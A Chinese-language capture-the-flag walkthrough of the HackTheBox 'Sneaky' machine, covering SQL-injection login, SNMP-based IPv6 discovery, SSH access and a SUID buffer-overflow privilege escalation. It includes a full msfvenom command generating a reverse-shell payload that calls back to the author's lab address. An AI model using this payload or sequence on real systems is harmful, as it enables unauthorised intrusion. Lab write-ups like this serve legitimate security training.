**
HackTheBox-Linux-Sneaky-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/19
靶机难度:中级(5.0/10)
靶机发布日期:2017年10月29日
靶机描述:
Sneaky, while not requiring many steps to complete, can be difficult for some users. It explores enumeration through SNMP and has a beginner level buffer overflow vulnerability which can be leveraged for privilege escalation.
作者:大余
时间:2020-05-16
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.20…
Nmap扫描仅发现开放了Apache和SNMP两个服务…
80端口上没什么可用的信息…直接枚举爆破看看…
枚举发现了dev目录…
dev目录提供了此页面…通过利用burpsuit拦截尝试sql注入枚举爆破…
可看到通过尝试通用的sql注入代码…成功登录…
登录后获得了两个用户名信息:admin和thrasivoulos
以及rsa 的key,这里很熟悉吧…就在前面两三章就做了两次一模一样的环境…
思路就是利用rsa的key通过ssh服务访问到用户…从而在用户提权root…但是nmap只发现开放了http和snmp服务…未开放ssh服务??
这里熟悉的小伙伴就知道,snmp关联着ipv6信息…可以参考:https://www.jianshu.com/p/dc2dc0222940
将key保存到本地…
利用snmpwalk命令来和snmp主机进行交换数据…
可以看到存在可用的IPv6接口信息…需要获得靶机的ipv6信息…
可以看到Enyx专门用来获取ipv6的信息工具…利用即可…
通过利用enyx获取了所有接口的ipv6信息…
检查发现…nmap扫描IPv6信息对方是开启了ssh的…那这就直接登录即可…
直接利用前面获取的信息量…成功登录了,并获得了user信息…(这里就不多说了,连续靶机都是类似环境)
直接通过LinEnum.sh枚举所有信息量…
在查看到SUID位时,resrwsr的chal程序存在异常…应该是缓冲区溢出提权了…(这里环境和前面一台靶机差不多…雷同,那台也是ssh登录后缓冲区溢出提权…那台是可以直接利用/bin/sh写入程序直接获得root…)
下载到本地分析…
这里直接快速了…做了太多缓冲区溢出了…获得了偏移量362…
命令:msfvenom -a x86 --platform -linux -p linux/x86/shell_reverse_tcp LHOST=10.10.14.51 LPORT=6666 -e x86/alpha_mixed -f python
这里我利用了msf生成的shell…也可以利用原生的shell简单…很多shell自行google
知道偏移量,在获取EIP即可提权…这里我编写的简单shell脚本nop是x90,直接对程序x/100x $esp-200发现了很多可以利用的EIP,这里的都可以利用…直接写入…
这里我利用了788的EIP,别的也试过也成功…或者不需要NOP的情况直接google /bin/sh源直接利用原生EIP提权也行…
成功注入shell提权root,获得了root.txt信息…
由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
